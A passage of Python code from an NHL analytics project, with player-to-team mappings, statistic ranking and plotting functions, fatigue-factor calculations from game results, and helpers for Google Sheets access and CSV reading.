'BOS'\n\t\tnew_team['DEREK_GRANT'] = 'PHI'\n\t\t#new_team['PATRICK_MARLEAU'] = 'PIT'\n\t\tnew_team['WAYNE_SIMMONDS'] = 'BUF'\n\t\tnew_team['NATE_THOMPSON'] = 'PHI'\n\t\tnew_team['VINCENT_TROCHECK'] = 'CAR'\n\t\tnew_team['ERIK_HAULA'] = 'FLA'\n\t\tnew_team['LUCAS_WALLMARK'] = 'FLA'\n\t\tnew_team['JEAN-GABRIEL_PAGEAU'] = 'NYI'\n\t\tnew_team['VLADISLAV_NAMESTNIKOV'] = 'COL'\n\t\tnew_team['ILYA_KOVALCHUK'] = 'WSH'\n\t\tnew_team['ANDREAS_ATHANASIOU'] = 'EDM'\n\t\tnew_team['SAM_GAGNER'] = 'DET'\n\t\tnew_team['TYLER_ENNIS'] = 'EDM'\n\t\tnew_team['EVAN_RODRIGUES'] = 'PIT'\n\t\tnew_team['CONOR_SHEARY'] = 'PIT'\n\t\tnew_team['DOMINIK_KAHUN'] = 'BUF'\n\t\tnew_team['SONNY_MILANO'] = 'ANA'\n\t\tnew_team['DEVIN_SHORE'] = 'CBJ'\n\t\tnew_team['BARCLAY_GOODROW'] = 'TBL'\n\t\tnew_team['DANIEL_SPRONG'] = 'WSH'\n\t\tnew_team['MIKE_GREEN'] = 'EDM'\n\t\tnew_team['CHRISTIAN_DJOOS'] = 'ANA'\n\t\tnew_team['NICK_COUSINS'] = 'VGK'\n\t\tnew_team['MATTHEW_PECA'] = 'OTT'\n\t\tnew_team['ZACH_BOGOSIAN'] = 'TBL'\n\t\tnew_team['CODY_GOLOUBEF'] = 'DET'\n\t\tnew_team['ANDREW_AGOZZINO'] = 'ANA'\n\t\tnew_team['MATT_IRWIN'] = 'ANA'\n\t\tnew_team['DEREK_FORBORT'] = 'LAK'\n\t\tnew_team['BRADY_SKJEI'] = 'CAR'\n\t\tnew_team['ERIK_GUSTAFSSON'] = 'CGY'\n\t\tnew_team['ROBIN_LEHNER'] ='VGK'\n\t\tnew_team['ONDREJ_KASE'] = 'BOS'\n\t\tnew_team['CALLE_ROSEN'] = 'TOR'\n\t\tnew_team['DAVID_BACKES'] = 'ANA'\n\t\tnew_team['DMYTRO_TIMASHOV'] = 'DET'\n\t\tnew_team['LOUIS_DOMINGUE'] = 'VAN'\n\t\tnew_team['MICHAEL_HUTCHINSON'] = 'COL'\n\t\tnew_team['BRANDON_DAVIDSON'] = 'SJS'\n\t\tnew_team['MALCOLM_SUBBAN'] = 'CHI'\n\t\tnew_team['KORBINIAN_HOLZER'] = 'NSH'\n\n\t\tteam_id = raw_team_str\n\t\t# Make sure players have been added to their new clubs. 
If not, set an error.\n\t\tteam_id_arr = (team_id.replace(' ','').split(','))\n\t\tif len(team_id_arr) > 1:\n\t\t\tif player_id not in new_team.keys():\n\t\t\t\t#raise ValueError('Player ' + player_id + ' has more than one team(s). Team-ID: ' + team_id)\n\t\t\t\tprint('Player ' + player_id + ' has more than one team(s). Team-ID: ' + team_id + '. Using team ' + team_id_arr[0] + ' for analysis.')\n\t\t\t\tteam_id = team_id_arr[0]\n\t\t\t\t\n\t\t\tif len(team_id_arr) > 2:\n\t\t\t\tif player_id not in manually_checked_players:\n\t\t\t\t\t#raise ValueError('Player ' + player_id + ' (' + str(raw_team_str) + ') changed club more than once. Please add to \"manually_checked_players\" to continue.')\n\t\t\t\t\tprint('Player ' + player_id + ' has more than one team(s). Team-ID: ' + team_id + '. Using team ' + team_id_arr[0] + ' for analysis.')\n\t\t\t\t\tteam_id = team_id_arr[0]\n\n\t\tif team_id == 'L.A':\n\t\t\tteam_id = 'LAK'\n\t\telif team_id == 'N.J':\n\t\t\tteam_id = 'NJD'\n\t\telif team_id == 'S.J':\n\t\t\tteam_id = 'SJS'\n\t\telif team_id == 'T.B':\n\t\t\tteam_id = 'TBL'\t\t\n\t\telif team_id == 'PHX':\n\t\t\tteam_id = 'ARI'\n\n\t\tif player_id in set(new_team.keys()):\n\t\t\tteam_id = new_team[player_id]\n\n\t\t# Weird special case due to misspelled team_id at NST-data.\n\t\tif team_id == 'PTI':\n\t\t\tteam_id = 'PIT' \n\n\t\tif team_id not in ACTIVE_TEAMS:\n\t\t\traise ValueError('Team-ID for player ' + player_id + ' is incorrect (\"' + team_id + '\")')\n\n\treturn [player_id,team_id]\n\ndef print_sorted_list(db,attributes,operation=None,_filter=None,print_list_length=50,scale_factor=1,high_to_low=True,do_print=True,normalize=False):\n\n\tif _filter == None:\n\t\t_filter['toi'] = 0\n\t\t_filter['position'] = ['F','D']\n\t\t_filter['additional_players'] = []\n\t\t_filter['team'] = None\n\t\t_filter['playform'] = STAT_ES\n\t\t\n\toutput = {}\n\tadded_players = set()\n\tsorted_list,data_list = [],[]\n\tfor skater_id in db.keys():\n\t\tskater = db[skater_id]\n\t\t#if (skater.ind['toi'][_filter['playform']] >= 60*_filter['toi'] and skater.bio['position'] in _filter['position']) or (skater_id in _filter['additional_players']):\n\t\tif (skater.ind['toi'][_filter['playform']] >= 60*_filter['toi'] and skater.bio['position'] in _filter['position']):\n\t\t\tif len(attributes) > 1:\n\t\t\t\tif attributes[0] == 'ranking':\n\t\t\t\t\tval = skater.get_attribute(attributes[1],playform_index='ranking')\n\t\t\t\telse:\n\t\t\t\t\tval_a = skater.get_attribute(attributes[0],_filter['playform'])\n\t\t\t\t\tval_b = skater.get_attribute(attributes[1],_filter['playform'])\n\t\t\t\t\tval = operation(val_a,val_b)\n\t\t\telse:\n\t\t\t\tval = skater.get_attribute(attributes[0],_filter['playform'])\n\t\t\tval *= scale_factor\n\t\t\tif _filter['team'] == None:\n\t\t\t\tsorted_list.append((val,skater_id))\n\t\t\t\tdata_list.append(val)\n\t\t\t\tadded_players.add(skater_id)\n\t\t\telse:\n\t\t\t\tif skater.bio['team_id'] in _filter['team']:\n\t\t\t\t\tsorted_list.append((val,skater_id))\n\t\t\t\t\tdata_list.append(val)\n\t\t\t\t\tadded_players.add(skater_id)\n\t\t\tif (skater_id in _filter['additional_players']) and (skater_id not in added_players):\n\t\t\t\tsorted_list.append((val,skater_id))\n\t\t\t\tdata_list.append(val)\n\n\t# This is not very nice.\n\tsorted_list.sort(reverse=high_to_low)\n\tdata_list.sort(reverse=high_to_low)\n\n\toutput['mu'] = np.mean(data_list)\n\toutput['sigma'] = np.std(data_list)\n\toutput['list'] = sorted_list\n\toutput['data'] = data_list\n\tif normalize == True:\n\t\tnorm_factor = 
1/np.max(data_list)\n\telse:\n\t\tnorm_factor = 1\n\tif do_print == True:\n\t\tprint('{0}. Scale factor={1:.0f}. Min.TOI={2:.0f}. Total players={3:.0f}. Average value={4:.2f}. Stdev={5:.2f}.'.format(attributes,scale_factor,_filter['toi'],len(sorted_list),output['mu'],output['sigma']))\n\t\tranking = 0\n\t\tfor pair in sorted_list:\n\t\t\tranking += 1\n\t\t\tskater_id = pair[1]\n\t\t\tskater = db[skater_id]\n\t\t\tif ranking <= print_list_length or skater_id in _filter['additional_players']:\n\t\t\t\tif attributes[0] == 'ranking':\n\t\t\t\t\tval = norm_factor*pair[0]\n\t\t\t\t\tprint('{0}: {1} ({2}) - {3:.2f} ({4:.2f} sigma. TOI: {5:.1f} min/gp)'.format(ranking,skater.bio['name'],skater.bio['team_id'],val,(val-output['mu'])/output['sigma'],(skater.get_attribute('toi')/60)/skater.get_attribute('gp')))\n\t\t\t\t\t#print(' Ranking: {0:.0f}'.format(skater.get_attribute(attributes[1],'ranking')))\n\t\t\t\telse:\n\t\t\t\t\tval = norm_factor*pair[0]\n\t\t\t\t\tprint('{0}: {1} ({2}) - {3:.2f} ({4:.2f} sigma)'.format(ranking,skater.bio['name'],skater.bio['team_id'],val,(val-output['mu'])/output['sigma']))\n\t\t\t\t\tprint(' TOI: {0:.1f} minutes'.format(skater.get_toi(_filter['playform'])/60))\n\t\t\t\t\tfor attribute in attributes:\n\t\t\t\t\t\tprint(' {0}: {1:.2f}'.format(attribute,scale_factor*skater.get_attribute(attribute,_filter['playform'])))\n\treturn output\n\ndef print_sorted_list_goalie(db,attribute,_filter,print_list_length=10,scale_factor=1,high_to_low=True,do_print=True,normalize=False):\n\tif _filter == None:\n\t\t_filter['toi'] = 0\n\t\t_filter['additional_players'] = []\n\t\t_filter['team'] = None\n\toutput = {}\n\tadded_players = set()\n\tsorted_list,data_list = [],[]\n\tfor goalie_id in db.keys():\n\t\tgoalie = db[goalie_id]\n\t\tif goalie.get_attribute('toi') >= 60*_filter['toi'] or goalie_id in _filter['additional_players']:\n\t\t\tval = goalie.get_attribute(attribute) * scale_factor\n\t\t\tif _filter['team'] == None:\n\t\t\t\tsorted_list.append((val,goalie_id))\n\t\t\t\tdata_list.append(val)\n\t\t\t\tadded_players.add(goalie_id)\n\t\t\telse:\n\t\t\t\tif goalie.get_attribute('team_id') in _filter['team']:\n\t\t\t\t\tsorted_list.append((val,goalie_id))\n\t\t\t\t\tdata_list.append(val)\n\t\t\t\t\tadded_players.add(goalie_id)\n\t\t\tif (goalie_id in _filter['additional_players']) and (goalie_id not in added_players):\n\t\t\t\tsorted_list.append((val,goalie_id))\n\t\t\t\tdata_list.append(val)\n\n\t# This is not very nice.\n\tsorted_list.sort(reverse=high_to_low)\n\tdata_list.sort(reverse=high_to_low)\n\toutput['mu'] = np.mean(data_list)\n\toutput['sigma'] = np.std(data_list)\n\toutput['list'] = sorted_list\n\toutput['data'] = data_list\n\tif normalize == True:\n\t\tnorm_factor = 1/np.max(data_list)\n\telse:\n\t\tnorm_factor = 1\n\tif do_print == True:\n\t\tprint('{0}. Scale factor={1:.0f}. Min.TOI={2:.0f}. Total players={3:.0f}. 
Average value={4:.2f}.'.format(attribute,scale_factor,_filter['toi'],len(sorted_list),output['mu']))\n\t\tranking = 0\n\t\tfor pair in sorted_list:\n\t\t\tranking += 1\n\t\t\tgoalie_id = pair[1]\n\t\t\tgoalie = db[goalie_id]\n\t\t\tif ranking <= print_list_length or goalie_id in _filter['additional_players']:\n\t\t\t\tval = norm_factor*pair[0]\n\t\t\t\tprint('{0}: {1} ({2}) - {3:.2f} ({4:.2f} sigma)'.format(ranking,goalie.get_attribute('name'),goalie.get_attribute('team_id'),val,(val-output['mu'])/output['sigma']))\n\treturn output\n\ndef get_pair_index(pair_list,key):\n\tfor idx,pair in enumerate(pair_list):\n\t\tval = pair[0]\n\t\tname = pair[1]\n\t\tif name == key:\n\t\t\treturn [idx,val]\n\traise ValueError('No key ' + key + ' found in list')\n\ndef get_sigma_difference(db,player_id,attribute,playform=STAT_ES):\n\top = print_sorted_list(db,[attribute],playform,operation=None,toi_filter=200,position_filter=['F','D'],team=None,print_list_length=50,scale_factor=1,high_to_low=True,do_print=False,normalize=False)\n\tplayer = db[player_id]\n\tplayer_val = player.get_attribute(attribute,playform)\n\treturn (player_val-op['mu'])/op['sigma']\n\n\n\ndef plot_player_cards(ax,axes_info,p_db,player_ids,_filter):\n\t# Init\n\tgen_x,gen_y,spec_x,spec_y,markers = [],[],[],[],[]\n\toutput = {}\n\toutput['pair_list'], output['data_list'] = [],[]\n\tydata_only = False\n\ttmp_index = 0\n\t\n\t# Set up additional axes information\n\tif axes_info['x']['attribute'] == None:\n\t\taxes_info['fit_data'] = False\n\t\tydata_only = True\n\t\taxes_info['x']['label'] = 'Player no.'\n\t\taxes_info['x']['invert'] = False\n\t\n\t# Set up color/markers\n\tcolors = ['c','m','g','r','b'] # black and yellow are protected colors.\n\tforms = ['o','v','s','*','x','p','d']\n\tfor form in forms:\n\t\tfor color in colors:\n\t\t\tmarkers.append(str(form + color))\n\n\t# Error check\n\tif len(player_ids) > len(markers):\n\t\twarnings.warn('Too many players to plot, text output only')\n\t\tdo_plots = False\n\telse:\n\t\tdo_plots = True\n\t# Plot all data for league\n\tfor tmp_id in p_db:\n\t\ttmp_player = p_db[tmp_id]\n\t\tif (tmp_player.get_toi() > _filter['toi']*60) and (tmp_player.get_attribute('position') in _filter['position']):\n\t\t\tif ydata_only == True:\n\t\t\t\tgen_x.append(tmp_index)\n\t\t\t\ttmp_index += 1\n\t\t\telse:\n\t\t\t\tgen_x.append(axes_info['x']['scale']*tmp_player.get_attribute(axes_info['x']['attribute']))\n\t\t\tgen_y.append(axes_info['y']['scale']*tmp_player.get_attribute(axes_info['y']['attribute']))\n\tplt.scatter(gen_x,gen_y,c='k',marker='.')\n\n\t# Add mean value.\n\tplt.scatter(np.mean(gen_x),np.mean(gen_y),c='y',marker='s',label='NHL mean')\n\t\n\t# Fit linear model to (scatter) data.\n\tif axes_info['fit_data'] == True:\n\t\tfit = np.polyfit(gen_x, gen_y, 1)\n\t\tfit_fn = np.poly1d(fit)\n\t\tk = round(fit[0],4)\n\t\toutput['fit'] = fit\n\t\toutput['fit_fn'] = fit_fn\n\t\tx_val = range(int(np.min(ax.get_xlim())),int(np.max(ax.get_xlim())))\n\t\tplt.plot(x_val,fit_fn(x_val),'y--',label='Data fit (k=' + str(k) + ')')\n\t\n\t# Add 50% threshold.\n\tif axes_info['add_threshold'] == True:\n\t\tstart = int(np.min([np.min(ax.get_xlim()),np.min(ax.get_ylim())]))\n\t\tstop = int(np.max([np.max(ax.get_xlim()),np.max(ax.get_ylim())]))\n\t\tplt.plot(range(start,stop),range(start,stop),'k--',label='50% threshold')\n\n\t# Plot data for the specified players.\n\tmarker_idx = 0\n\tfor i, player_id in enumerate(player_ids):\n\t\tplayer = p_db[player_id]\n\t\tif player.get_toi() < 
_filter['toi']*60:\n\t\t\twarnings.warn('Player ' + player_id + ' has played less than ' + str(_filter['toi']) + ' minutes even strength (' + str(int(player.get_toi()/60)) + '). Data not included in plot(s).')\n\t\telse:\n\t\t\tif (player.get_attribute('position') in _filter['position']):\n\t\t\t\tif do_plots == True:\n\t\t\t\t\tcurrent_marker = markers[marker_idx]\n\t\t\t\tif (ydata_only == True) and (do_plots == True):\n\t\t\t\t\tplt.scatter(i,axes_info['y']['scale']*player.get_attribute(axes_info['y']['attribute']),c=current_marker[1],marker=current_marker[0],label=player_id)\n\t\t\t\telse:\n\t\t\t\t\tif axes_info['fit_data'] == True:\n\t\t\t\t\t\tx_val = axes_info['x']['scale']*player.get_attribute(axes_info['x']['attribute'])\n\t\t\t\t\t\ty_val = axes_info['y']['scale']*player.get_attribute(axes_info['y']['attribute'])\n\t\t\t\t\t\ty_est = fit_fn(x_val)\n\t\t\t\t\t\ty_diff = y_val - y_est\n\t\t\t\t\t\toutput['pair_list'].append((y_diff,player_id))\n\t\t\t\t\t\toutput['data_list'].append(y_diff)\n\t\t\t\t\t\tif y_diff > 0:\n\t\t\t\t\t\t\tsign = '+'\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tsign = ''\n\t\t\t\t\t\tlbl_val_str = ' (' + sign + str(int(100*y_diff/y_est)) + '%)'\n\t\t\t\t\telse:\n\t\t\t\t\t\tlbl_val_str = ''\n\t\t\t\t\tif do_plots == True:\n\t\t\t\t\t\tplt.scatter(axes_info['x']['scale']*player.get_attribute(axes_info['x']['attribute']),axes_info['y']['scale']*player.get_attribute(axes_info['y']['attribute']),c=current_marker[1],marker=current_marker[0],label=player_id+lbl_val_str)\n\t\t\t\tmarker_idx += 1\n\t\n\t# Invert axis for readability.\n\tif axes_info['x']['invert'] == True:\n\t\tax.invert_xaxis() \n\tif axes_info['y']['invert'] == True:\n\t\tax.invert_yaxis()\n\n\t# Plot stuff\n\tplt.xlabel(axes_info['x']['label'])\n\tplt.ylabel(axes_info['y']['label'])\n\tfont_size = np.min([140/len(player_ids),9])\n\tax.legend(loc='upper left', bbox_to_anchor=(1.0, 1.03), ncol=1, fontsize=font_size)\n\tplt.subplots_adjust(left=0.05,bottom=0.07,top=0.95,right=0.82,hspace=0.3)\n\tplt.grid(True)\n\n\toutput['pair_list'].sort(reverse=True)\n\treturn [plt,ax,output]\n\n\n\ndef weighted_sum(lst,w_lst):\n\top = 0\n\tif len(lst) != len(w_lst):\n\t\traise ValueError('Incompatible lengths')\n\tfor i in range(len(lst)):\n\t\top += w_lst[i]*lst[i]\n\n\treturn op\n\ndef get_from_distribution(val_dict,attribute,normalize=False):\n\t# ct_on_ice_db[skater_id] = [isf_per_time,sh_pcg,pt_per_time,pd_per_time,off_per_time,def_per_time]\n\t\n\tsum_value = 1.0\n\tif attribute == 'isf_per_time':\t\t\n\t\tindex = 0\n\telif attribute == 'sh_pcg':\n\t\tindex = 1\n\telif attribute == 'pt_per_time':\n\t\tindex = 2\n\telif attribute == 'pd_per_time':\n\t\tindex = 3\n\telif attribute == 'off_per_time':\n\t\tindex = 4\n\telif attribute == 'def_per_time':\n\t\tindex = 5\n\telse:\n\t\traise ValueError('Unknown attribute ' + attribute)\n\tif normalize == True:\n\t\tvals = []\n\t\tfor p_id in val_dict.keys():\n\t\t\tplayer_values = val_dict[p_id]\n\t\t\tvals.append(player_values[index])\n\t\tsum_value = np.sum(vals)\n\twhile True:\n\t\tfor p_id in set(val_dict.keys()): # set for randomizing purposes\n\t\t\tplayer_values = val_dict[p_id]\n\t\t\tif sum_value == 0: # special case\n\t\t\t\treturn p_id\n\t\t\tif random.uniform(0,1) <= (player_values[index]/sum_value):\n\t\t\t\treturn p_id\n\ndef acces_gsheet(name_of_ws,credential_path='creds.json'):\n\t# Open/access g-Sheet\n\t#name_of_ws = \"SharksData_Public\"\n\tcredential_path = 'creds.json' \t\t\t# Old version\n\tprint('Authentication Google Sheet \"' + name_of_ws 
+'\"...')\n\tjson_key = json.load(open(credential_path)) # json credentials you downloaded earlier\n\tscope = ['https://spreadsheets.google.com/feeds',\n\t 'https://www.googleapis.com/auth/drive']\n\tcredentials = SignedJwtAssertionCredentials(json_key['client_email'], json_key['private_key'].encode(), scope) # get email and key from creds\n\tg_file = gspread.authorize(credentials) # authenticate with Google\n\tprint('Authentication done')\n\tprint('Opening worksheet...')\n\tg_wb = g_file.open(name_of_ws) # Open Google WorkBook\n\treturn g_wb\n\ndef get_alpha(pos=None):\n\t# translates column index (1,2,3) to column name ('A','B','C'). \n\talpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','X','Y','Z']\n\tcombined_alpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','X','Y','Z']\n\tfor f_letter in alpha:\n\t\tfor s_letter in alpha:\n\t\t\tcombined_alpha.append(f_letter + s_letter)\n\n\tif pos == None:\n\t\treturn combined_alpha\n\telse:\n\t\treturn combined_alpha[pos-1]\n\ndef evaluate_combination(s_db,player_ids,attributes=['estimated_off_per_60','estimated_def_per_60','pd_diff_per_60']):\n\tif isinstance(player_ids, list) == False:\n\t\traise ValueError('Uncompatible types. Input must be a (list-of) list(s).')\n\telse:\n\t\tif isinstance(player_ids[0],list):\n\t\t\t# List of line combinations\n\t\t\tprint('@TODO')\n\t\telse:\n\t\t\tdata_values = len(attributes)*[0]\n\t\t\tfor player_id in player_ids:\n\t\t\t\tskater = s_db[player_id]\n\t\t\t\tfor i,attribute in enumerate(attributes):\n\t\t\t\t\tdata_values[i] += skater.get_attribute(attribute)\n\t\t\tfor i,attribute in enumerate(attributes):\n\t\t\t\tprint(str(player_ids) + ': ' + attribute + ': ' + str(data_values[i]))\n\treturn data_values\t\t\n\ndef print_player_from_team(player_db,team_id,position=[]):\n\tif position == []:\n\t\tposition = ['G','D','F']\n\tfor player_id in player_db:\n\t\tplayer = get_skater(player_db,player_id)\n\t\tif (player.bio['team_id'] == team_id) and (player.bio['position'] in position):\n\t\t\tprint(player_id)\n\ndef get_sorted_db(simulation_param,value_key,cut_off=None,toi_filter=0,position_filter=None,best_first=True):\n\t\"\"\"\n\tReturn the cut_off best players in a certain category. 
Can filter out players based on time-on-ice [minutes]\n\t\"\"\"\n\tlst = []\n\tsplit_key = value_key.split('_')\n\tsplit_val_key = ''\n\tfor val in split_key[1:]:\n\t\tsplit_val_key += val + '_'\n\tsplit_val_key = split_val_key[:-1]\n\tif position_filter == None:\n\t\tposition_filter = ['G','D','F']\n\tfor skater_id in simulation_param['databases']['skater_db'].keys():\n\t\tskater = get_skater(simulation_param['databases']['skater_db'],skater_id)\n\t\tif (skater.es['toi']/60 >= toi_filter) and (skater.bio['position'] in position_filter):\n\t\t\tif split_key[0] == 'es':\n\t\t\t\tlst.append((skater.es[split_val_key],skater_id))\n\t\t\telif split_key[0] == 'on_ice':\n\t\t\t\tlst.append((skater.on_ice[split_val_key],skater_id))\n\t\t\telse:\n\t\t\t\traise ValueError('Unknown split-key \"' + value_key.split('_')[0] + '\"')\n\tlst.sort(reverse=best_first)\n\tif cut_off == None:\n\t\treturn lst\n\telse:\n\t\treturn lst[0:cut_off]\n\n\ndef create_player_list(s_db,_filter):\n\tlist_of_players = []\n\tfor skater_id in ACTIVE_SKATERS:\n\t\tskater = get_skater(s_db,skater_id)\n\t\tplayer_ok = True\n\t\tfor attribute in _filter:\n\t\t\tif isinstance(_filter[attribute],str) == True:\n\t\t\t\tif skater.get_attribute(attribute) != _filter[attribute]:\n\t\t\t\t\tplayer_ok &= False\n\t\t\telif _filter[attribute] > 0:\n\t\t\t\tif skater.get_attribute(attribute) < _filter[attribute]:\n\t\t\t\t\tplayer_ok &= False\n\t\t\telif _filter[attribute] < 0:\n\t\t\t\tif skater.get_attribute(attribute) > -1*_filter[attribute]:\n\t\t\t\t\tplayer_ok &= False\n\n\t\tif player_ok:\n\t\t\tlist_of_players.append(skater_id)\n\t\n\treturn list_of_players\n\ndef get_probability(values,idx=0):\n\tif isinstance(values, list) == False:\n\t\traise ValueError('Uncompatible types. Input must be a list.')\n\telse:\n\t\tval = values[idx]\n\t\treturn val/sum(values)\n\ndef get_skater_values(skater_db):\n\tvalues_dict = defaultdict(list)\n\tfor skater_id in ACTIVE_SKATERS:\n\t\tskater = skater_db[skater_id]\n\t\tvalues_dict['estimated_off_per_60'].append(skater.on_ice['estimated_off_per_60'])\n\t\tvalues_dict['estimated_def_per_60'].append(skater.on_ice['estimated_def_per_60'])\n\t\tvalues_dict['estimated_off_pcg'].append(skater.on_ice['estimated_off_pcg'])\n\t\tvalues_dict['estimated_off_diff'].append(skater.on_ice['estimated_off_diff'])\n\t\tvalues_dict['primary_points_per_60'].append(skater.ind['primary_points_per_60'][0])\n\t\tvalues_dict['goal_scoring_rating'].append(skater.ind['goal_scoring_rating'][0])\n\treturn values_dict\n\ndef get_team_values(team_db):\n\tvalues_dict = defaultdict(list)\n\tfor team_id in ACTIVE_TEAMS:\n\t\tteam = team_db[team_id]\n\t\tvalues_dict['p_pcg'].append(team.p_pcg)\n\t\tvalues_dict['gf_pcg'].append(team.gf_pcg)\n\t\tvalues_dict['sf_pcg'].append(team.sf_pcg)\n\t\tvalues_dict['cf_pcg'].append(team.cf_pcg)\n\t\tvalues_dict['ff_pcg'].append(team.ff_pcg)\n\t\tvalues_dict['xgf_pcg'].append(team.xgf_pcg)\n\t\tvalues_dict['scf_pcg'].append(team.scf_pcg)\n\t\tvalues_dict['hdcf_pcg'].append(team.hdcf_pcg)\n\t\tvalues_dict['sv_pcg'].append(team.sv_pcg)\n\t\tvalues_dict['pdo'].append(team.pdo)\n\t\tvalues_dict['hits'].append(team.exp_data['hits'])\n\t\tvalues_dict['hits_taken'].append(team.exp_data['hits_taken'])\n\t\tvalues_dict['hits_diff'].append(team.exp_data['hits_diff'])\n\t\tvalues_dict['estimated_off_pcg'].append(team.exp_data['estimated_off_pcg'])\n\t\tvalues_dict['in_season_rating'].append(team.exp_data['in_season_rating'])\n\treturn values_dict\n\ndef get_rank(value,lst):\n\t'''\n\tReturns the rank of 
the value in the list\n\t'''\n\tlst.sort(reverse=False)\n\trank = 1\n\tfor lst_val in lst:\n\t\tif lst_val == value:\n\t\t\treturn rank\n\t\trank += 1\n\tif rank > len(lst):\n\t\traise ValueError('Could not find value ' + str(value) + ' in the list.')\n\ndef generate_fatigue_factors(csv_path='Data/nhl_result_from_2018.csv'):\n\tfatigue_factors = {}\n\tfor team_id in ACTIVE_TEAMS:\n\t\tteam = get_long_name(team_id)\n\t\tfatigue_factors[team_id] = {}\n\t\top_days = {}\n\t\top_days[0],op_days[1],op_days[2] = defaultdict(int),defaultdict(int),defaultdict(int)\n\t\top_all = defaultdict(int)\n\t\tall_gf, all_ga, all_p, all_p_total = 0,0,0,0\n\t\tht_gf_idx = 2\n\t\tat_gf_idx = 4\n\t\tot_idx = 5\n\t\tprev_date = -1\n\t\twith open(csv_path,'rt') as f:\n\t\t\t\treader = csv.reader(f, delimiter=',')\n\t\t\t\tfor row in reader:\n\t\t\t\t\tif row[1] != 'Date':\n\t\t\t\t\t\tht = row[1]\n\t\t\t\t\t\tat = row[3]\n\t\t\t\t\t\tif (ht == team) or (at == team):\n\t\t\t\t\t\t\tif team == ht:\n\t\t\t\t\t\t\t\tgf = int(row[ht_gf_idx])\n\t\t\t\t\t\t\t\tga = int(row[at_gf_idx])\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tgf = int(row[at_gf_idx])\n\t\t\t\t\t\t\t\tga = int(row[ht_gf_idx])\n\t\t\t\t\t\t\tthis_date = row[0]\n\t\t\t\t\t\t\tif prev_date != -1:\n\t\t\t\t\t\t\t\tdays_since_last_game = get_delta_days(prev_date,this_date) - 1\n\t\t\t\t\t\t\t\tif days_since_last_game >= 2:\n\t\t\t\t\t\t\t\t\tdays_since_last_game = 2\n\t\t\t\t\t\t\t\tif gf > ga:\n\t\t\t\t\t\t\t\t\tp = 2\n\t\t\t\t\t\t\t\telif row[ot_idx] != '':\n\t\t\t\t\t\t\t\t\tp = 1\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tp = 0\n\t\t\t\t\t\t\t\top_days[days_since_last_game]['games_played'] += 1\n\t\t\t\t\t\t\t\top_days[days_since_last_game]['gf'] += gf\n\t\t\t\t\t\t\t\top_days[days_since_last_game]['ga'] += ga\n\t\t\t\t\t\t\t\top_days[days_since_last_game]['p'] += p\n\t\t\t\t\t\t\t\top_days[days_since_last_game]['p_total'] += 2\n\t\t\t\t\t\t\t\top_all['gf'] += gf\n\t\t\t\t\t\t\t\top_all['ga'] += ga\n\t\t\t\t\t\t\t\top_all['p'] += p\n\t\t\t\t\t\t\t\top_all['p_total'] += 2\n\t\t\t\t\t\t\tprev_date = this_date\n\n\t\ttotal_gf_pcg = get_probability([op_all['gf'],op_all['ga']])\n\t\ttotal_p_pcg = op_all['p']/op_all['p_total']\n\t\tfor i in range(3):\n\t\t\tdays_gf_pcg = get_probability([op_days[i]['gf'],op_days[i]['ga']])\n\t\t\tdays_p_pcg = op_days[i]['p']/op_days[i]['p_total']\n\t\t\top_days[i]['gf_pcg'] = days_gf_pcg\n\t\t\top_days[i]['gf_pcg_rel'] = days_gf_pcg/total_gf_pcg\n\t\t\top_days[i]['p_pcg'] = days_p_pcg\n\t\t\top_days[i]['p_pcg_rel'] = days_p_pcg/total_p_pcg\n\t\tfatigue_factors[team_id]['per_days_rested'] = op_days\n\t\tfatigue_factors[team_id]['total'] = op_all\n\treturn fatigue_factors\n\ndef get_fatigue_factor(fatigue_factors,team_id,days_rested=-1):\n\tif days_rested == -1:\n\t\treturn fatigue_factors[team_id]\n\telse:\n\t\tif days_rested > 2:\n\t\t\twarnings.warn('2 days of rest is maximum. 
Returning fatigue factor for 2 rest days (' + str(days_rested) + ' selected).')\n\t\t\tdays_rested = 2\n\t\treturn fatigue_factors[team_id]['per_days_rested'][days_rested]['p_pcg_rel']\n\ndef generate_starting_goalies():\n\tstarting_goalies_dict = generate_all_teams_dict(return_type=None)\n\treturn starting_goalies_dict\n\ndef handler(signum,frame):\n\t#print('Connection timed out')\n\traise Exception(\"Connection timed out\")\n\ndef get_k_factor(x_array,y_array,do_plot=False):\n\tfit = np.polyfit(x_array, y_array, 1)\n\tfit_fn = np.poly1d(fit)\n\tk = round(fit[0],4)\n\tif do_plot == True:\n\t\tplt.figure(1)\n\t\tx_val = np.linspace(1,31,31)\n\t\tplt.scatter(x_array,y_array,c='k',marker='.')\n\t\tplt.plot(x_val,fit_fn(x_val),'y--',label='Data fit (k=' + str(k) + ')')\n\t\tplt.show()\n\treturn k\n\ndef cond_bp():\n\traise ValueError('Conditional breakpoint')\n\ndef backup_data_dir(src,dst):\n\t'''\n\tBackup all csv-files from the source folder to the destination folder\n\t'''\n\tlist_of_all = os.listdir(src)\n\tlist_of_files = []\n\tfor filename in list_of_all:\n\t\tfilepath = os.path.join(src,filename)\n\t\tif os.path.splitext(filepath)[1] == '.csv':\n\t\t\tcopyfile(filepath,os.path.join(dst,filename))\n\ndef generic_csv_reader(csv_file_path,dict_key_attribute='name',output_attributes=False):\n\t'''\n\tAssuming the first line holds the headers.\n\tReturns a dict keyed according to the input dict_key_attribute;\n \t\toutput[dict_key] = {}\n \t\toutput[dict_key][header_1] = value_1\n \t\toutput[dict_key][header_2] = value_2\n \t\t...\n \t\toutput[dict_key][header_n] = value_n\n\t'''\n\toutput = {}\n\tattributes = []\n\twith open(csv_file_path,'rt') as f:\n\t\treader = csv.reader(f, delimiter=',')\n\t\tfirst_row = True\n\t\tfor row in reader:\n\t\t\tif first_row == True:\n\t\t\t\tfirst_row = False\n\t\t\t\t# Extract headers\n\t\t\t\t'''\n\t\t\t\tfor value in row:\n\t\t\t\t\tattributes.append(str(value).lower())\n\t\t\t\t'''\n\t\t\t\tattributes = row\n\t\t\t\tif output_attributes == True:\n\t\t\t\t\toutput['attributes'] = attributes\n\t\t\t\tif dict_key_attribute not in attributes:\n\t\t\t\t\traise ValueError('Could not find dictionary key \"' + dict_key_attribute + '\" in attributes: ' + str(attributes))\n\t\t\t\tdict_key_index = 